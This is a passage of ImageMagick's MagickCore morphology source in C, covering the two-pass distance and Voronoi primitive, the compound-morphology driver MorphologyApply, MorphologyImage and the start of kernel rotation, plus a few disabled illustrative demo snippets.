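for (i = 6; i >= 0; i--) /* backward pass */
if (d[i+1]+1 < d[i]) d[i] = d[i+1]+1;
for (i = 0; i < 8; i++)
printf("%d ", d[i]); /* prints: 0 1 2 3 2 1 0 1 */
printf("\n");
return(0);
}
#endif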
static ssize_t MorphologyPrimitiveDirect(Image *image,
const MorphologyMethod method,const KernelInfo *kernel,
ExceptionInfo *exception)
{
CacheView
*morphology_view,
*image_view;
MagickBooleanType
status;
MagickOffsetType
progress;
OffsetInfo
offset;
size_t
width,
changed;
ssize_t
y;
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
assert(kernel != (KernelInfo *) NULL);
assert(kernel->signature == MagickCoreSignature);
assert(exception != (ExceptionInfo *) NULL);
assert(exception->signature == MagickCoreSignature);
status=MagickTrue;
changed=0;
progress=0;
switch(method)
{
case DistanceMorphology:
case VoronoiMorphology:
{
/*
Kernel reflected about origin.
*/
offset.x=(ssize_t) kernel->width-kernel->x-1;
offset.y=(ssize_t) kernel->height-kernel->y-1;
break;
}
default:
{
offset.x=kernel->x;
offset.y=kernel->y;
break;
}
}
/*
Two views into the same image, do not thread.
*/
image_view=AcquireVirtualCacheView(image,exception);
morphology_view=AcquireAuthenticCacheView(image,exception);
width=image->columns+kernel->width-1;
for (y=0; y < (ssize_t) image->rows; y++)
{
register const Quantum
*magick_restrict p;
register Quantum
*magick_restrict q;
register ssize_t
x;
ssize_t
center;
/*
Read virtual pixels, and authentic pixels, from the same image! We read
using virtual to get virtual pixel handling, but write back into the same
image.
Only the top half of the kernel is processed, as we make a single
downward pass through the image, iterating the distance function as we go.
*/
if (status == MagickFalse)
continue;
p=GetCacheViewVirtualPixels(image_view,-offset.x,y-offset.y,width,(size_t)
offset.y+1,exception);
q=GetCacheViewAuthenticPixels(morphology_view,0,y,image->columns,1,
exception);
if ((p == (const Quantum *) NULL) || (q == (Quantum *) NULL))
{
status=MagickFalse;
continue;
}
center=(ssize_t) (GetPixelChannels(image)*width*offset.y+
GetPixelChannels(image)*offset.x);
for (x=0; x < (ssize_t) image->columns; x++)
{
register ssize_t
i;
for (i=0; i < (ssize_t) GetPixelChannels(image); i++)
{
double
pixel;
PixelTrait
traits;
register const MagickRealType
*magick_restrict k;
register const Quantum
*magick_restrict pixels;
register ssize_t
u;
ssize_t
v;
traits=GetPixelChannelTraits(image,(PixelChannel) i);
if (traits == UndefinedPixelTrait)
continue;
if (((traits & CopyPixelTrait) != 0) ||
(GetPixelWriteMask(image,p+center) <= (QuantumRange/2)))
continue;
pixels=p;
pixel=(double) QuantumRange;
switch (method)
{
case DistanceMorphology:
{
k=(&kernel->values[kernel->width*kernel->height-1]);
for (v=0; v <= offset.y; v++)
{
for (u=0; u < (ssize_t) kernel->width; u++)
{
if (!IsNaN(*k))
{
if ((pixels[i]+(*k)) < pixel)
pixel=(double) pixels[i]+(*k);
}
k--;
pixels+=GetPixelChannels(image);
}
pixels+=(image->columns-1)*GetPixelChannels(image);
}
k=(&kernel->values[kernel->width*(kernel->y+1)-1]);
pixels=q-offset.x*GetPixelChannels(image);
for (u=0; u < offset.x; u++)
{
if (!IsNaN(*k) && ((x+u-offset.x) >= 0))
{
if ((pixels[i]+(*k)) < pixel)
pixel=(double) pixels[i]+(*k);
}
k--;
pixels+=GetPixelChannels(image);
}
break;
}
case VoronoiMorphology:
{
k=(&kernel->values[kernel->width*kernel->height-1]);
for (v=0; v < offset.y; v++)
{
for (u=0; u < (ssize_t) kernel->width; u++)
{
if (!IsNaN(*k))
{
if ((pixels[i]+(*k)) < pixel)
pixel=(double) pixels[i]+(*k);
}
k--;
pixels+=GetPixelChannels(image);
}
pixels+=(image->columns-1)*GetPixelChannels(image);
}
k=(&kernel->values[kernel->width*(kernel->y+1)-1]);
pixels=q-offset.x*GetPixelChannels(image);
for (u=0; u < offset.x; u++)
{
if (!IsNaN(*k) && ((x+u-offset.x) >= 0))
{
if ((pixels[i]+(*k)) < pixel)
pixel=(double) pixels[i]+(*k);
}
k--;
pixels+=GetPixelChannels(image);
}
break;
}
default:
break;
}
if (fabs(pixel-q[i]) > MagickEpsilon)
changed++;
q[i]=ClampToQuantum(pixel);
}
p+=GetPixelChannels(image);
q+=GetPixelChannels(image);
}
if (SyncCacheViewAuthenticPixels(morphology_view,exception) == MagickFalse)
status=MagickFalse;
if (image->progress_monitor != (MagickProgressMonitor) NULL)
{
MagickBooleanType
proceed;
proceed=SetImageProgress(image,MorphologyTag,progress++,2*image->rows);
if (proceed == MagickFalse)
status=MagickFalse;
}
}
morphology_view=DestroyCacheView(morphology_view);
image_view=DestroyCacheView(image_view);
/*
Do the reverse pass through the image.
*/
image_view=AcquireVirtualCacheView(image,exception);
morphology_view=AcquireAuthenticCacheView(image,exception);
for (y=(ssize_t) image->rows-1; y >= 0; y--)
{
register const Quantum
*magick_restrict p;
register Quantum
*magick_restrict q;
register ssize_t
x;
ssize_t
center;
/*
Read virtual pixels, and authentic pixels, from the same image. We
read using virtual to get virtual pixel handling, but write back
into the same image.
Only the bottom half of the kernel is processed, as we make a single
pass upward through the image.
*/
if (status == MagickFalse)
continue;
p=GetCacheViewVirtualPixels(image_view,-offset.x,y,width,(size_t)
kernel->y+1,exception);
q=GetCacheViewAuthenticPixels(morphology_view,0,y,image->columns,1,
exception);
if ((p == (const Quantum *) NULL) || (q == (Quantum *) NULL))
{
status=MagickFalse;
continue;
}
p+=(image->columns-1)*GetPixelChannels(image);
q+=(image->columns-1)*GetPixelChannels(image);
center=(ssize_t) (offset.x*GetPixelChannels(image));
for (x=(ssize_t) image->columns-1; x >= 0; x--)
{
register ssize_t
i;
for (i=0; i < (ssize_t) GetPixelChannels(image); i++)
{
double
pixel;
PixelTrait
traits;
register const MagickRealType
*magick_restrict k;
register const Quantum
*magick_restrict pixels;
register ssize_t
u;
ssize_t
v;
traits=GetPixelChannelTraits(image,(PixelChannel) i);
if (traits == UndefinedPixelTrait)
continue;
if (((traits & CopyPixelTrait) != 0) ||
(GetPixelWriteMask(image,p+center) <= (QuantumRange/2)))
continue;
pixels=p;
pixel=(double) QuantumRange;
switch (method)
{
case DistanceMorphology:
{
k=(&kernel->values[kernel->width*(kernel->y+1)-1]);
for (v=offset.y; v < (ssize_t) kernel->height; v++)
{
for (u=0; u < (ssize_t) kernel->width; u++)
{
if (!IsNaN(*k))
{
if ((pixels[i]+(*k)) < pixel)
pixel=(double) pixels[i]+(*k);
}
k--;
pixels+=GetPixelChannels(image);
}
pixels+=(image->columns-1)*GetPixelChannels(image);
}
k=(&kernel->values[kernel->width*kernel->y+kernel->x-1]);
pixels=q;
for (u=offset.x+1; u < (ssize_t) kernel->width; u++)
{
pixels+=GetPixelChannels(image);
if (!IsNaN(*k) && ((x+u-offset.x) < (ssize_t) image->columns))
{
if ((pixels[i]+(*k)) < pixel)
pixel=(double) pixels[i]+(*k);
}
k--;
}
break;
}
case VoronoiMorphology:
{
k=(&kernel->values[kernel->width*(kernel->y+1)-1]);
for (v=offset.y; v < (ssize_t) kernel->height; v++)
{
for (u=0; u < (ssize_t) kernel->width; u++)
{
if (!IsNaN(*k))
{
if ((pixels[i]+(*k)) < pixel)
pixel=(double) pixels[i]+(*k);
}
k--;
pixels+=GetPixelChannels(image);
}
pixels+=(image->columns-1)*GetPixelChannels(image);
}
k=(&kernel->values[kernel->width*(kernel->y+1)-1]);
pixels=q;
for (u=offset.x+1; u < (ssize_t) kernel->width; u++)
{
pixels+=GetPixelChannels(image);
if (!IsNaN(*k) && ((x+u-offset.x) < (ssize_t) image->columns))
{
if ((pixels[i]+(*k)) < pixel)
pixel=(double) pixels[i]+(*k);
}
k--;
}
break;
}
default:
break;
}
if (fabs(pixel-q[i]) > MagickEpsilon)
changed++;
q[i]=ClampToQuantum(pixel);
}
p-=GetPixelChannels(image);
q-=GetPixelChannels(image);
}
if (SyncCacheViewAuthenticPixels(morphology_view,exception) == MagickFalse)
status=MagickFalse;
if (image->progress_monitor != (MagickProgressMonitor) NULL)
{
MagickBooleanType
proceed;
proceed=SetImageProgress(image,MorphologyTag,progress++,2*image->rows);
if (proceed == MagickFalse)
status=MagickFalse;
}
}
morphology_view=DestroyCacheView(morphology_view);
image_view=DestroyCacheView(image_view);
return(status ? (ssize_t) changed : -1);
}
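/*
  Editor's illustrative sketch (not part of MagickCore): the same two-pass
  technique used by MorphologyPrimitiveDirect() above, reduced to a plain
  4-connected chamfer distance transform on a tiny grid.  The forward pass
  only looks at the top/left neighbors, the reverse pass only at the
  bottom/right neighbors.  Guarded out so the module still compiles.
*/
#if 0
#include <stdio.h>
#define DEMO_W 5
#define DEMO_H 5
#define DEMO_INF 9999
static void ChamferDemo(void)
{
  int d[DEMO_H][DEMO_W], x, y;
  /* single feature pixel at the center; everything else starts "far away" */
  for (y=0; y < DEMO_H; y++)
    for (x=0; x < DEMO_W; x++)
      d[y][x]=((x == 2) && (y == 2)) ? 0 : DEMO_INF;
  /* forward pass: single downward sweep using top and left neighbors */
  for (y=0; y < DEMO_H; y++)
    for (x=0; x < DEMO_W; x++)
      {
        if ((y > 0) && (d[y-1][x]+1 < d[y][x])) d[y][x]=d[y-1][x]+1;
        if ((x > 0) && (d[y][x-1]+1 < d[y][x])) d[y][x]=d[y][x-1]+1;
      }
  /* reverse pass: single upward sweep using bottom and right neighbors */
  for (y=DEMO_H-1; y >= 0; y--)
    for (x=DEMO_W-1; x >= 0; x--)
      {
        if ((y < DEMO_H-1) && (d[y+1][x]+1 < d[y][x])) d[y][x]=d[y+1][x]+1;
        if ((x < DEMO_W-1) && (d[y][x+1]+1 < d[y][x])) d[y][x]=d[y][x+1]+1;
      }
  /* prints the Manhattan distance to the center for every cell */
  for (y=0; y < DEMO_H; y++, (void) printf("\n"))
    for (x=0; x < DEMO_W; x++)
      (void) printf("%2d ", d[y][x]);
}
#endif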
/*
Apply a Morphology by calling one of the above low-level primitive
application functions. This function handles any iteration loops,
composition or re-iteration of results, and compound morphology methods
that are based on multiple low-level (staged) morphology methods.
Basically this provides the complex glue between the requested morphology
method and the raw low-level implementations (above).
*/
MagickPrivate Image *MorphologyApply(const Image *image,
const MorphologyMethod method, const ssize_t iterations,
const KernelInfo *kernel, const CompositeOperator compose,const double bias,
ExceptionInfo *exception)
{
CompositeOperator
curr_compose;
Image
*curr_image, /* Image we are working with or iterating */
*work_image, /* secondary image for primitive iteration */
*save_image, /* saved image - for 'edge' method only */
*rslt_image; /* resultant image - after multi-kernel handling */
KernelInfo
*reflected_kernel, /* A reflected copy of the kernel (if needed) */
*norm_kernel, /* the current normal un-reflected kernel */
*rflt_kernel, /* the current reflected kernel (if needed) */
*this_kernel; /* the kernel being applied */
MorphologyMethod
primitive; /* the current morphology primitive being applied */
CompositeOperator
rslt_compose; /* multi-kernel compose method for results to use */
MagickBooleanType
special, /* do we use a direct modify function? */
verbose; /* verbose output of results */
size_t
method_loop, /* Loop 1: number of compound method iterations (norm 1) */
method_limit, /* maximum number of compound method iterations */
kernel_number, /* Loop 2: the kernel number being applied */
stage_loop, /* Loop 3: primitive loop for compound morphology */
stage_limit, /* how many primitives are in this compound */
kernel_loop, /* Loop 4: iterate the kernel over image */
kernel_limit, /* number of times to iterate kernel */
count, /* total count of primitive steps applied */
kernel_changed, /* total count of changed using iterated kernel */
method_changed; /* total count of changed over method iteration */
ssize_t
changed; /* number pixels changed by last primitive operation */
char
v_info[MagickPathExtent];
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
assert(kernel != (KernelInfo *) NULL);
assert(kernel->signature == MagickCoreSignature);
assert(exception != (ExceptionInfo *) NULL);
assert(exception->signature == MagickCoreSignature);
count = 0; /* number of low-level morphology primitives performed */
if ( iterations == 0 )
return((Image *) NULL); /* null operation - nothing to do! */
kernel_limit = (size_t) iterations;
if ( iterations < 0 ) /* negative iterations = infinite (well, almost) */
kernel_limit = image->columns>image->rows ? image->columns : image->rows;
verbose = IsStringTrue(GetImageArtifact(image,"debug"));
/* initialise for cleanup */
curr_image = (Image *) image;
curr_compose = image->compose;
(void) curr_compose;
work_image = save_image = rslt_image = (Image *) NULL;
reflected_kernel = (KernelInfo *) NULL;
/* Initialize specific methods
* + which loop should use the given iterations
* + how many primitives make up the compound morphology
* + multi-kernel compose method to use (by default)
*/
method_limit = 1; /* just do method once, unless otherwise set */
stage_limit = 1; /* assume method is not a compound */
special = MagickFalse; /* assume it is NOT a direct modify primitive */
rslt_compose = compose; /* and we are composing multi-kernels as given */
switch( method ) {
case SmoothMorphology: /* 4 primitive compound morphology */
stage_limit = 4;
break;
case OpenMorphology: /* 2 primitive compound morphology */
case OpenIntensityMorphology:
case TopHatMorphology:
case CloseMorphology:
case CloseIntensityMorphology:
case BottomHatMorphology:
case EdgeMorphology:
stage_limit = 2;
break;
case HitAndMissMorphology:
rslt_compose = LightenCompositeOp; /* Union of multi-kernel results */
/* FALL THROUGH */
case ThinningMorphology:
case ThickenMorphology:
method_limit = kernel_limit; /* iterate the whole method */
kernel_limit = 1; /* do not do kernel iteration */
break;
case DistanceMorphology:
case VoronoiMorphology:
special = MagickTrue; /* use special direct primitive */
break;
default:
break;
}
/* Apply special methods with special requirements
** For example, single run only, or post-processing requirements
*/
if ( special != MagickFalse )
{
rslt_image=CloneImage(image,0,0,MagickTrue,exception);
if (rslt_image == (Image *) NULL)
goto error_cleanup;
if (SetImageStorageClass(rslt_image,DirectClass,exception) == MagickFalse)
goto error_cleanup;
changed=MorphologyPrimitiveDirect(rslt_image,method,kernel,exception);
if (verbose != MagickFalse)
(void) FormatLocaleFile(stderr,
"%s:%.20g.%.20g #%.20g => Changed %.20g\n",
CommandOptionToMnemonic(MagickMorphologyOptions, method),
1.0,0.0,1.0, (double) changed);
if ( changed < 0 )
goto error_cleanup;
if ( method == VoronoiMorphology ) {
/* Preserve the alpha channel of the input image, but leave it turned off */
(void) SetImageAlphaChannel(rslt_image, DeactivateAlphaChannel,
exception);
(void) CompositeImage(rslt_image,image,CopyAlphaCompositeOp,
MagickTrue,0,0,exception);
(void) SetImageAlphaChannel(rslt_image, DeactivateAlphaChannel,
exception);
}
goto exit_cleanup;
}
/* Handle user (caller) specified multi-kernel composition method */
if ( compose != UndefinedCompositeOp )
rslt_compose = compose; /* override default composition for method */
if ( rslt_compose == UndefinedCompositeOp )
rslt_compose = NoCompositeOp; /* still not defined! Then re-iterate */
/* Some methods require a reflected kernel to use with primitives.
* Create the reflected kernel for those methods. */
switch ( method ) {
case CorrelateMorphology:
case CloseMorphology:
case CloseIntensityMorphology:
case BottomHatMorphology:
case SmoothMorphology:
reflected_kernel = CloneKernelInfo(kernel);
if (reflected_kernel == (KernelInfo *) NULL)
goto error_cleanup;
RotateKernelInfo(reflected_kernel,180);
break;
default:
break;
}
/* Loops around the more primitive morphology methods
** erode, dilate, open, close, smooth, edge, etc...
*/
/* Loop 1: iterate the compound method */
method_loop = 0;
method_changed = 1;
while ( method_loop < method_limit && method_changed > 0 ) {
method_loop++;
method_changed = 0;
/* Loop 2: iterate over each kernel in a multi-kernel list */
norm_kernel = (KernelInfo *) kernel;
this_kernel = (KernelInfo *) kernel;
rflt_kernel = reflected_kernel;
kernel_number = 0;
while ( norm_kernel != NULL ) {
/* Loop 3: Compound Morphology Staging - Select Primitive to apply */
stage_loop = 0; /* the compound morphology stage number */
while ( stage_loop < stage_limit ) {
stage_loop++; /* The stage of the compound morphology */
/* Select primitive morphology for this stage of compound method */
this_kernel = norm_kernel; /* default use unreflected kernel */
primitive = method; /* Assume method is a primitive */
switch( method ) {
case ErodeMorphology: /* just erode */
case EdgeInMorphology: /* erode and image difference */
primitive = ErodeMorphology;
break;
case DilateMorphology: /* just dilate */
case EdgeOutMorphology: /* dilate and image difference */
primitive = DilateMorphology;
break;
case OpenMorphology: /* erode then dilate */
case TopHatMorphology: /* open and image difference */
primitive = ErodeMorphology;
if ( stage_loop == 2 )
primitive = DilateMorphology;
break;
case OpenIntensityMorphology:
primitive = ErodeIntensityMorphology;
if ( stage_loop == 2 )
primitive = DilateIntensityMorphology;
break;
case CloseMorphology: /* dilate, then erode */
case BottomHatMorphology: /* close and image difference */
this_kernel = rflt_kernel; /* use the reflected kernel */
primitive = DilateMorphology;
if ( stage_loop == 2 )
primitive = ErodeMorphology;
break;
case CloseIntensityMorphology:
this_kernel = rflt_kernel; /* use the reflected kernel */
primitive = DilateIntensityMorphology;
if ( stage_loop == 2 )
primitive = ErodeIntensityMorphology;
break;
case SmoothMorphology: /* open, close */
switch ( stage_loop ) {
case 1: /* start an open method, which starts with Erode */
primitive = ErodeMorphology;
break;
case 2: /* now Dilate the Erode */
primitive = DilateMorphology;
break;
case 3: /* Reflect the kernel to start a close */
this_kernel = rflt_kernel; /* use the reflected kernel */
primitive = DilateMorphology;
break;
case 4: /* Finish the Close */
this_kernel = rflt_kernel; /* use the reflected kernel */
primitive = ErodeMorphology;
break;
}
break;
case EdgeMorphology: /* dilate and erode difference */
primitive = DilateMorphology;
if ( stage_loop == 2 ) {
save_image = curr_image; /* save the image difference */
curr_image = (Image *) image;
primitive = ErodeMorphology;
}
break;
case CorrelateMorphology:
/* A Correlation is a Convolution with a reflected kernel.
** However a Convolution is a weighted sum using a reflected
** kernel. It may seem strange to convert a Correlation into a
** Convolution as the Correlation is the simpler method, but
** Convolution is much more commonly used, and it makes sense to
** implement it directly so as to avoid the need to duplicate the
** kernel when it is not required (which is typically the
** default).
*/
this_kernel = rflt_kernel; /* use the reflected kernel */
primitive = ConvolveMorphology;
break;
default:
break;
}
assert( this_kernel != (KernelInfo *) NULL );
/* Extra information for debugging compound operations */
if (verbose != MagickFalse) {
if ( stage_limit > 1 )
(void) FormatLocaleString(v_info,MagickPathExtent,"%s:%.20g.%.20g -> ",
CommandOptionToMnemonic(MagickMorphologyOptions,method),(double)
method_loop,(double) stage_loop);
else if ( primitive != method )
(void) FormatLocaleString(v_info, MagickPathExtent, "%s:%.20g -> ",
CommandOptionToMnemonic(MagickMorphologyOptions, method),(double)
method_loop);
else
v_info[0] = '\0';
}
/* Loop 4: Iterate the kernel with primitive */
kernel_loop = 0;
kernel_changed = 0;
changed = 1;
while ( kernel_loop < kernel_limit && changed > 0 ) {
kernel_loop++; /* the iteration of this kernel */
/* Create a clone as the destination image, if not yet defined */
if ( work_image == (Image *) NULL )
{
work_image=CloneImage(image,0,0,MagickTrue,exception);
if (work_image == (Image *) NULL)
goto error_cleanup;
if (SetImageStorageClass(work_image,DirectClass,exception) == MagickFalse)
goto error_cleanup;
}
/* APPLY THE MORPHOLOGICAL PRIMITIVE (curr -> work) */
count++;
changed = MorphologyPrimitive(curr_image, work_image, primitive,
this_kernel, bias, exception);
if (verbose != MagickFalse) {
if ( kernel_loop > 1 )
(void) FormatLocaleFile(stderr, "\n"); /* add end-of-line from previous */
(void) FormatLocaleFile(stderr,
"%s%s%s:%.20g.%.20g #%.20g => Changed %.20g",
v_info,CommandOptionToMnemonic(MagickMorphologyOptions,
primitive),(this_kernel == rflt_kernel ) ? "*" : "",
(double) (method_loop+kernel_loop-1),(double) kernel_number,
(double) count,(double) changed);
}
if ( changed < 0 )
goto error_cleanup;
kernel_changed += changed;
method_changed += changed;
/* prepare next loop */
{ Image *tmp = work_image; /* swap images for iteration */
work_image = curr_image;
curr_image = tmp;
}
if ( work_image == image )
work_image = (Image *) NULL; /* replace input 'image' */
} /* End Loop 4: Iterate the kernel with primitive */
if (verbose != MagickFalse && kernel_changed != (size_t)changed)
(void) FormatLocaleFile(stderr, " Total %.20g",(double) kernel_changed);
if (verbose != MagickFalse && stage_loop < stage_limit)
(void) FormatLocaleFile(stderr, "\n"); /* add end-of-line before looping */
#if 0
(void) FormatLocaleFile(stderr, "--E-- image=0x%lx\n", (unsigned long)image);
(void) FormatLocaleFile(stderr, " curr =0x%lx\n", (unsigned long)curr_image);
(void) FormatLocaleFile(stderr, " work =0x%lx\n", (unsigned long)work_image);
(void) FormatLocaleFile(stderr, " save =0x%lx\n", (unsigned long)save_image);
(void) FormatLocaleFile(stderr, " union=0x%lx\n", (unsigned long)rslt_image);
#endif
} /* End Loop 3: Primitive (staging) Loop for Compound Methods */
/* Final Post-processing for some Compound Methods
**
** The removal of any 'Sync' channel flag in the Image Composition
** below ensures the mathematical compose method is applied in a
** purely mathematical way, and only to the selected channels.
** Turn off SVG composition 'alpha blending'.
*/
switch( method ) {
case EdgeOutMorphology:
case EdgeInMorphology:
case TopHatMorphology:
case BottomHatMorphology:
if (verbose != MagickFalse)
(void) FormatLocaleFile(stderr,
"\n%s: Difference with original image",CommandOptionToMnemonic(
MagickMorphologyOptions, method) );
(void) CompositeImage(curr_image,image,DifferenceCompositeOp,
MagickTrue,0,0,exception);
break;
case EdgeMorphology:
if (verbose != MagickFalse)
(void) FormatLocaleFile(stderr,
"\n%s: Difference of Dilate and Erode",CommandOptionToMnemonic(
MagickMorphologyOptions, method) );
(void) CompositeImage(curr_image,save_image,DifferenceCompositeOp,
MagickTrue,0,0,exception);
save_image = DestroyImage(save_image); /* finished with save image */
break;
default:
break;
}
/* multi-kernel handling: re-iterate, or compose results */
if ( kernel->next == (KernelInfo *) NULL )
rslt_image = curr_image; /* just return the resulting image */
else if ( rslt_compose == NoCompositeOp )
{ if (verbose != MagickFalse) {
if ( this_kernel->next != (KernelInfo *) NULL )
(void) FormatLocaleFile(stderr, " (re-iterate)");
else
(void) FormatLocaleFile(stderr, " (done)");
}
rslt_image = curr_image; /* return result, and re-iterate */
}
else if ( rslt_image == (Image *) NULL)
{ if (verbose != MagickFalse)
(void) FormatLocaleFile(stderr, " (save for compose)");
rslt_image = curr_image;
curr_image = (Image *) image; /* continue with original image */
}
else
{ /* Add the new 'current' result to the composition
**
** The removal of any 'Sync' channel flag in the Image Composition
** below ensures the mathematical compose method is applied in a
** purely mathematical way, and only to the selected channels.
** IE: Turn off SVG composition 'alpha blending'.
*/
if (verbose != MagickFalse)
(void) FormatLocaleFile(stderr, " (compose \"%s\")",
CommandOptionToMnemonic(MagickComposeOptions, rslt_compose) );
(void) CompositeImage(rslt_image,curr_image,rslt_compose,MagickTrue,
0,0,exception);
curr_image = DestroyImage(curr_image);
curr_image = (Image *) image; /* continue with original image */
}
if (verbose != MagickFalse)
(void) FormatLocaleFile(stderr, "\n");
/* loop to the next kernel in a multi-kernel list */
norm_kernel = norm_kernel->next;
if ( rflt_kernel != (KernelInfo *) NULL )
rflt_kernel = rflt_kernel->next;
kernel_number++;
} /* End Loop 2: Loop over each kernel */
} /* End Loop 1: compound method iteration */
goto exit_cleanup;
/* Yes, goto's are bad, but they make cleanup a lot more efficient */
error_cleanup:
if ( curr_image == rslt_image )
curr_image = (Image *) NULL;
if ( rslt_image != (Image *) NULL )
rslt_image = DestroyImage(rslt_image);
exit_cleanup:
if ( curr_image == rslt_image || curr_image == image )
curr_image = (Image *) NULL;
if ( curr_image != (Image *) NULL )
curr_image = DestroyImage(curr_image);
if ( work_image != (Image *) NULL )
work_image = DestroyImage(work_image);
if ( save_image != (Image *) NULL )
save_image = DestroyImage(save_image);
if ( reflected_kernel != (KernelInfo *) NULL )
reflected_kernel = DestroyKernelInfo(reflected_kernel);
return(rslt_image);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% M o r p h o l o g y I m a g e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% MorphologyImage() applies a user supplied kernel to the image according to
% the given morphology method.
%
% This function applies any and all user defined settings before calling
% the above internal function MorphologyApply().
%
% User defined settings include...
% * Output Bias for Convolution and correlation ("-define convolve:bias=??")
% * Kernel Scale/normalize settings ("-define convolve:scale=??")
% This can also include the addition of a scaled unity kernel.
% * Show Kernel being applied ("-define morphology:showkernel=1")
%
% Other operators that do not want user supplied options interfering,
% especially "convolve:bias" and "morphology:showkernel" should use
% MorphologyApply() directly.
%
% The format of the MorphologyImage method is:
%
% Image *MorphologyImage(const Image *image,MorphologyMethod method,
% const ssize_t iterations,KernelInfo *kernel,ExceptionInfo *exception)
%
% A description of each parameter follows:
%
% o image: the image.
%
% o method: the morphology method to be applied.
%
% o iterations: apply the operation this many times (or until no change).
% A value of -1 means loop until no change is found.
% How this is applied may depend on the morphology method.
% Typically this is a value of 1.
%
% o kernel: An array of double representing the morphology kernel.
% Warning: kernel may be normalized for the Convolve method.
%
% o exception: return any errors or warnings in this structure.
%
*/
MagickExport Image *MorphologyImage(const Image *image,
const MorphologyMethod method,const ssize_t iterations,
const KernelInfo *kernel,ExceptionInfo *exception)
{
const char
*artifact;
CompositeOperator
compose;
double
bias;
Image
*morphology_image;
KernelInfo
*curr_kernel;
curr_kernel = (KernelInfo *) kernel;
bias=0.0;
compose = UndefinedCompositeOp; /* use default for method */
/* Apply Convolve/Correlate Normalization and Scaling Factors.
* This is done BEFORE the ShowKernelInfo() function is called so that
* users can see the results of the 'option:convolve:scale' option.
*/
if ( method == ConvolveMorphology || method == CorrelateMorphology ) {
/* Get the bias value as it will be needed */
artifact = GetImageArtifact(image,"convolve:bias");
if ( artifact != (const char *) NULL) {
if (IsGeometry(artifact) == MagickFalse)
(void) ThrowMagickException(exception,GetMagickModule(),
OptionWarning,"InvalidSetting","'%s' '%s'",
"convolve:bias",artifact);
else
bias=StringToDoubleInterval(artifact,(double) QuantumRange+1.0);
}
/* Scale kernel according to user wishes */
artifact = GetImageArtifact(image,"convolve:scale");
if ( artifact != (const char *) NULL ) {
if (IsGeometry(artifact) == MagickFalse)
(void) ThrowMagickException(exception,GetMagickModule(),
OptionWarning,"InvalidSetting","'%s' '%s'",
"convolve:scale",artifact);
else {
if ( curr_kernel == kernel )
curr_kernel = CloneKernelInfo(kernel);
if (curr_kernel == (KernelInfo *) NULL)
return((Image *) NULL);
ScaleGeometryKernelInfo(curr_kernel, artifact);
}
}
}
/* display the (normalized) kernel via stderr */
artifact=GetImageArtifact(image,"morphology:showkernel");
if (IsStringTrue(artifact) != MagickFalse)
ShowKernelInfo(curr_kernel);
/* Override the default handling of multi-kernel morphology results
* If 'Undefined' use the default method
* If 'None' (default for 'Convolve') re-iterate previous result
* Otherwise merge resulting images using compose method given.
* Default for 'HitAndMiss' is 'Lighten'.
*/
{
ssize_t
parse;
artifact = GetImageArtifact(image,"morphology:compose");
if ( artifact != (const char *) NULL) {
parse=ParseCommandOption(MagickComposeOptions,
MagickFalse,artifact);
if ( parse < 0 )
(void) ThrowMagickException(exception,GetMagickModule(),
OptionWarning,"UnrecognizedComposeOperator","'%s' '%s'",
"morphology:compose",artifact);
else
compose=(CompositeOperator)parse;
}
}
/* Apply the Morphology */
morphology_image = MorphologyApply(image,method,iterations,
curr_kernel,compose,bias,exception);
/* Cleanup and Exit */
if ( curr_kernel != kernel )
curr_kernel=DestroyKernelInfo(curr_kernel);
return(morphology_image);
}
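/*
  Editor's usage sketch (illustrative only): calling MorphologyImage() from
  application code.  Assumes an initialized MagickCore environment and the
  ImageMagick 7 AcquireKernelInfo(kernel_string,exception) signature.
*/
#if 0
static Image *ErodeExample(const Image *image,ExceptionInfo *exception)
{
  Image *result;
  KernelInfo *kernel;

  /* "Octagon" is one of the built-in shape kernels */
  kernel=AcquireKernelInfo("Octagon",exception);
  if (kernel == (KernelInfo *) NULL)
    return((Image *) NULL);
  /* three iterations of plain erosion */
  result=MorphologyImage(image,ErodeMorphology,3,kernel,exception);
  kernel=DestroyKernelInfo(kernel);
  return(result);
}
#endif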
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
+ R o t a t e K e r n e l I n f o %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% RotateKernelInfo() rotates the kernel by the angle given.
%
% Currently it is restricted to 90 degree rotations of either 1D kernels
% or square kernels, and 'circular' rotations of 45 degrees for 3x3 kernels.
% It will ignore useless rotations for specific 'named' built-in kernels.
%
% The format of the RotateKernelInfo method is:
%
% void RotateKernelInfo(KernelInfo *kernel, double angle)
%
% A description of each parameter follows:
%
% o kernel: the Morphology/Convolution kernel
%
% o angle: angle to rotate in degrees
%
% This function is currently internal to this module only, but can be exported
% to other modules if needed.
*/
static void RotateKernelInfo(KernelInfo *kernel, double angle)
{
/* rotate any lower kernels in the multi-kernel list first */
if ( kernel->next != (KernelInfo *) NULL)
RotateKernelInfo(kernel->next, angle);
/* WARNING: Currently assumes the kernel (rightly) is horizontally symmetrical
**
** TODO: expand beyond simple 90 degree rotates, flips and flops
*/
/* Modulus the angle */
angle = fmod(angle, 360.0);
if ( angle < 0 )
angle += 360.0;
if ( 337.5 < angle || angle <= 22.5 )
return; /* Near zero angle - no change! - At least not at this time */
/* Handle special cases */
switch (kernel->type) {
/* These built-in kernels are cylindrical kernels, rotating is useless */
case GaussianKernel:
case DoGKernel:
case LoGKernel:
case DiskKernel:
case PeaksKernel:
case LaplacianKernel:
case ChebyshevKernel:
case ManhattanKernel:
case EuclideanKernel:
return;
/* These may be rotatable at non-90 angles in the future */
/* but simply rotating them in multiples of 90 degrees is useless */
case SquareKernel:
case DiamondKernel:
case PlusKernel:
case CrossKernel:
return;
/* These only allow a +/-90 degree rotation (by transpose) */
/* A 180 degree rotation is useless */
case BlurKernel:
if ( 135.0 < angle && angle <= 225.0 )
return;
if ( 225.0 < angle && angle <= 315.0 )
angle -= 180;
break;
default:
break;
}
/* Attempt rotations by 45 degrees -- 3x3 kernels only */
